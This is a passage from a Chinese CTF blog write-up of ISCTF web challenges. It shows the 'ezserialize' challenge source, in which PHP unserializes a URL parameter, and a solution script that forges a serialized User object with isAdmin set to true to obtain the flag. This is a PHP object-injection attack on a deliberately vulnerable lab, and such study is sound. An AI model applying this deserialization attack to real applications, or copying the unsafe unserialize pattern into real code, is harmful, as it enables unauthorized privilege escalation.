public <span class="keyword">function</span> __toString() &#123;</span><br><span class="line">        <span class="keyword">return</span> &quot;You can&#x27;t directly access the flag!&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class <span class="keyword">User</span> &#123;</span><br><span class="line">    public $username;  #用户名</span><br><span class="line">    public $isAdmin <span class="operator">=</span> <span class="literal">false</span>;   #标记是不是管理员，默认为<span class="literal">false</span></span><br><span class="line"></span><br><span class="line">    public <span class="keyword">function</span> __construct($username) &#123;</span><br><span class="line">        $this<span class="operator">-</span><span class="operator">&gt;</span>username <span class="operator">=</span> $username;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public <span class="keyword">function</span> __wakeup() &#123;     #当反序列化一个<span class="keyword">User</span>对象时，会自动触发。如果$isAdmin是<span class="literal">true</span>则返回flag；如果不是，返回一句话</span><br><span class="line">        if ($this<span class="operator">-</span><span class="operator">&gt;</span>isAdmin) &#123;</span><br><span class="line">            echo &quot;Welcome, admin! Here&#x27;s your flag: &quot; . (<span class="keyword">new</span> Flag())<span class="operator">-</span><span class="operator">&gt;</span>getFlag();</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            echo &quot;Hello, &quot; . htmlspecialchars($this<span class="operator">-</span><span class="operator">&gt;</span>username) . &quot;!&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if (isset($_GET[<span class="string">&#x27;data&#x27;</span>])) &#123;     #通过URL传一个叫data的参数</span><br><span class="line">    $data <span class="operator">=</span> $_GET[<span class="string">&#x27;data&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    $object <span class="operator">=</span> unserialize($data);           #object等于data反序列化</span><br><span class="line">    if ($object instanceof <span class="keyword">User</span>) &#123;          #判断反序列化后的对象是否是<span class="keyword">User</span>类的实例，会触发__wakeup()（内置魔术方法），只要让$isAdmin<span class="operator">=</span><span class="literal">true</span>，即可返回flag</span><br><span class="line">        echo $object;                       </span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        echo &quot;Invalid object!&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?<span class="operator">&gt;</span></span><br></pre></td></tr></table></figure>

<p>1.创建一个User对象，将$isAdmin设置为true，然后序列化</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">&lt;</span>?php</span><br><span class="line">class <span class="keyword">User</span> &#123;</span><br><span class="line">    public $username;</span><br><span class="line">    public $isAdmin <span class="operator">=</span> <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">    public <span class="keyword">function</span> __construct($username) &#123;</span><br><span class="line">       $this<span class="operator">-</span><span class="operator">&gt;</span>username <span class="operator">=</span>$username;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$<span class="keyword">user</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="keyword">User</span>(&quot;test&quot;);</span><br><span class="line">echo serialize($<span class="keyword">user</span>);</span><br><span class="line">?<span class="operator">&gt;</span></span><br></pre></td></tr></table></figure>
<p>2.执行这个php文件，执行可得到序列化字符串</p>
<p><img src="https://github.com/Lin060807/images/raw/main/ez3.png" alt="ez3"></p>
<p>3.生成的字符串拼接到URL？data&#x3D;参数后面，服务器获取data参数值，通过unserialize()还原成User对象，反序列化自动触发__wakeup(),因为$isAdmin&#x3D;true直接输出flag。</p>
<p><img src="https://github.com/Lin060807/images/raw/main/ez4.png" alt="ez4"></p>

    </article>
    
    <div class="read-nums">
      <!-- id 将作为查询条件 -->
      <span id="2026/01/16/ISCTF-复现/" class="leancloud_visitors" data-flag-title="Your Article Title">
        <em class="post-meta-item-text">浏览量</em>
        <i class="leancloud-visitors-count"></i>
      </span>
    </div>
    <div class="comments-intro">
      <h2>评论区</h2>
      <p>欢迎你留下宝贵的意见，昵称输入QQ号会显示QQ头像哦~</p>
    </div>
    <div id="vcomments" class="vcomments"></div>
    
  </div>
  <div class="article-catelogue">
    <div class="article-catelogue--wrapper">
      <div class="catelogue catelogue-1">
        <h3>目录</h3>
        <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#2025ISCTF"><span class="toc-number">1.</span> <span class="toc-text">2025ISCTF</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-%E6%88%91%E5%B0%B1%E5%80%9F%E8%B5%B0%E4%BA%86"><span class="toc-number"></span> <span class="toc-text">flag?我就借走了</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Who-am-i"><span class="toc-number"></span> <span class="toc-text">Who am i</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ezrce"><span class="toc-number"></span> <span class="toc-text">ezrce</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#b-by-n0t1ce-b0ard"><span class="toc-number"></span> <span class="toc-text">b@by n0t1ce b0ard</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9A%BE%E8%BF%87%E7%9A%84bottle"><span class="toc-number"></span> <span class="toc-text">难过的bottle</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2024ISCTF"><span class="toc-number">1.</span> <span class="toc-text">2024ISCTF</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#25%E6%97%B6%E6%99%93%E5%B1%B1%E7%91%9E%E5%B8%8C%E7%94%9F%E6%97%A5%E4%BC%9A"><span class="toc-number"></span> <span class="toc-text">25时晓山瑞希生日会</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1z-php"><span class="toc-number"></span> <span class="toc-text">1z_php</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UP-UPloader"><span class="toc-number"></span> <span class="toc-text">UP!UPloader</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ezSSTI"><span class="toc-number"></span> <span class="toc-text">ezSSTI</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ezserialize"><span class="toc-number"></span> <span class="toc-text">ezserialize</span></a>
      </div>
      
        <div class="catelogue catelogue-2">
          
            <p>
              <span>上一篇：</span>
              <a href="/2026/01/16/极客大挑战2025-web复现/">极客大挑战2025 web复现</a>
            </p>
           
          
            <p>
              <span>下一篇</span>
              <a href="/2025/10/10/sql/">sql</a>
            </p>
          
        </div>
      
    </div>
  </div>
</div>


<script>
  // var定义，避免pjax重新进来造成的重复声明错误
  var config = JSON.parse('{"enable":true,"appId":"Pf8zCXGEH1qsprnWfikVVujL-gzGzoHsz","appKey":"qOqoiUHhH1TGtLRUYURkLRQX","placeholder":"请留下你宝贵的意见吧~","meta":["nick"],"recordIP":true,"visitor":true,"enableQQ":true}')
  new Valine({
    el: '#vcomments',
    appId: config.appId,
    appKey: config.appKey,
    placeholder: config.placeholder,
    meta: config.meta,
    recordIP: config.recordIP,
    visitor: config.visitor,
    enableQQ: config.enableQQ,
    path: '2026/01/16/ISCTF-复现/'
  })
</script>


<script>
  $(document).on('pjax:complete', function() {
    const tocs = document.querySelector('.toc')
    const links = tocs ? tocs.querySelectorAll('a') : []
    links.forEach(link => {
      link.addEventListener('click', e => {
        const href = decodeURIComponent(e.href)
        href.search(/#(.*)/)
        const id = RegExp.$1
        const target = document.querySelector('#' + id)
        const top = target.offsetTop
        document.documentElement.scrollTo({
          top: top - 100,
          behavior: 'smooth'
        })
        e.preventDefault()
      })
    })
  })
</script> 

</div>
      <div class="main-right-wrapper"><div class="main-right">
  <div class="main-right--board">
    <div class="main-right--title">
      <h5>公告栏</h5>
      <i class="iconfont icon-gonggao"></i>
    </div>
    <div class="main-right--content">
      Hello~学习中 
    </div>
  </div>

  <div id="aplayer" class="main-right--music"></div>

  <div class="operate-items">
    <div class="operate-item backtop">
      <i class="iconfont icon-huidaodingbu"></i>
      <span>回到顶部</span>
    </div>
    
    <div class="operate-item turn-comment hidden">
      <i class="iconfont icon-pinglun"></i>
      <span>查看评论</span>
    </div>
    
  </div>

  <div class="main-right--site">
    <div class="main-right--power">
      <p>Power By <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/docs/">Hexo</a>.</p>
      <p>Theme：<a target="_blank" rel="noopener" href="https://github.com/Aizener/hexo-theme-cola">Cola.</a></p>
    </div>
    <p class="main-right--refer"><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/#/Integrated/index">蜀ICP备2022005384号-1</a> </p>
  </div>
</div>

<script>
  function setOperateItem () {
    const reg = /\d{4}\/\d{2}\/\d{2}\/.+/
    const path = location.pathname
    const operateDom = document.querySelector('.main-right .operate-items')
    const commentDom = document.querySelector('.turn-comment')
    const cateloguDom = document.querySelector('.article-catelogue > .article-catelogue--wrapper');

    if (commentDom) {
      if (reg.test(path) || path.match(/\/log\/.+/)) {
        commentDom.classList.remove('hidden')
        const newDom = operateDom.cloneNode(true);
        const _backtopDom = newDom.querySelector('.backtop');
        const _commentDom = newDom.querySelector('.turn-comment');
        _backtopDom.addEventListener('click', () => backTopEvent());
        _commentDom.addEventListener('click', () => commentDomEvent());
        cateloguDom.appendChild(newDom);
      } else {
        commentDom.classList.add('hidden')
      }
    }
  }

  setOperateItem()
  const musics = JSON.parse(`[{"name":"你要的全拿走","artist":"胡彦彬","url":"https://github.com/Lin060807/music/raw/main/你要的全拿走.mp3","cover":"https://img2.baidu.com/it/u=1260056724,1076343118&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=500"},{"name":"年轮","artist":"张碧晨","url":"https://github.com/Lin060807/music/raw/main/年轮.mp3","cover":"https://img2.baidu.com/it/u=705831265,2862720033&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=500"}]`)
  const ap = new APlayer({
    container: document.querySelector('#aplayer'),
    audio: musics,
  })

  $(document).on('pjax:complete', function() {
    setOperateItem()
  })

  document.querySelector('.backtop').addEventListener('click', () => {
    backTopEvent();
  })
  const dom = document.querySelector('.turn-comment')
  dom && dom.addEventListener('click', () => {
    commentDomEvent();
  })

  function backTopEvent() {
    document.documentElement.scrollTo({
      top: 0,
      behavior: 'smooth'
    })
  }

  function commentDomEvent() {
    const commentDom = document.querySelector('.comments-intro')
    if (!commentDom) return
    const top = commentDom.offsetTop, height = commentDom.offsetHeight
    document.documentElement.scrollTo({
      top: top - 2 * height,
      behavior: 'smooth'
    })
  }
</script></div>
    </section>
  </div>
  <div id="progress" class="progress"></div>
  <div id="gray" class="gray"></div>

  <script>
    function initScroll () {
      document.addEventListener('scroll', () => {
        const doc = document.documentElement
        const scrollTop = doc.scrollTop
        const pageHeight = doc.offsetHeight
        const clientHeight = doc.clientHeight
        const ratio = scrollTop / (pageHeight - clientHeight)
        const progress = document.querySelector('#progress')
        const avatarImg = document.querySelector('.main-left--avatar')
        progress.style.width = (100 * ratio) + '%'
        avatarImg.style.transform = `rotate(${360 * ratio}deg)`
      })
    }

    const rootPath = "/"

    const checkAndSetArticlePageLayout = () => {
      const path = location.pathname.replace(rootPath, '');
      if (
        /^\/?\d{4}\/\d{2}\/\d{2}\/.*/.test(path) ||
        /^log\/.+/.test(path)
      ) {
        $('.main-container, .main-right, .main-right-wrapper').addClass('is-article')
      } else {
        $('.main-container, .main-right, .main-right-wrapper').removeClass('is-article')
      }
    }

    const gray = "none"
    const setGrayStyle = () => {
      if (gray === 'none') {
        return
      } else if (gray === 'index') {
        location.pathname === '/' ? $('#gray').show() : $('#gray').hide()
      } else if (gray === 'all') {
        $('#gray').show()
      }
    }
    setGrayStyle()


    window.onload = function () {
      checkAndSetArticlePageLayout()
      setTimeout(() => {
        $('#load').slideUp()
        $('#container').slideToggle()
        setTimeout(() => {
          initScroll();
        }, 500)
      }, 500)
    }
    
    let status = 0
    // 对所有链接跳转事件绑定pjax容器container
    $(document).pjax('a[target!=_blank]', '#main-container', {
      container: '#main-container',
      fragment: '#main-container',
      timeout: 8000
    })

    $(document).on('pjax:start', function() {
    })
    $(document).on('pjax:complete', function() {
      status = 0
      $('.main-container').addClass('to-up').on('animationend', function() {
        $(this).removeClass('to-up')
      })
      setGrayStyle()
      checkAndSetArticlePageLayout()
    })
    $(document).on('pjax:popstate', function() {
      status = -1
      checkAndSetArticlePageLayout()
    });
  </script>
</body>
</html>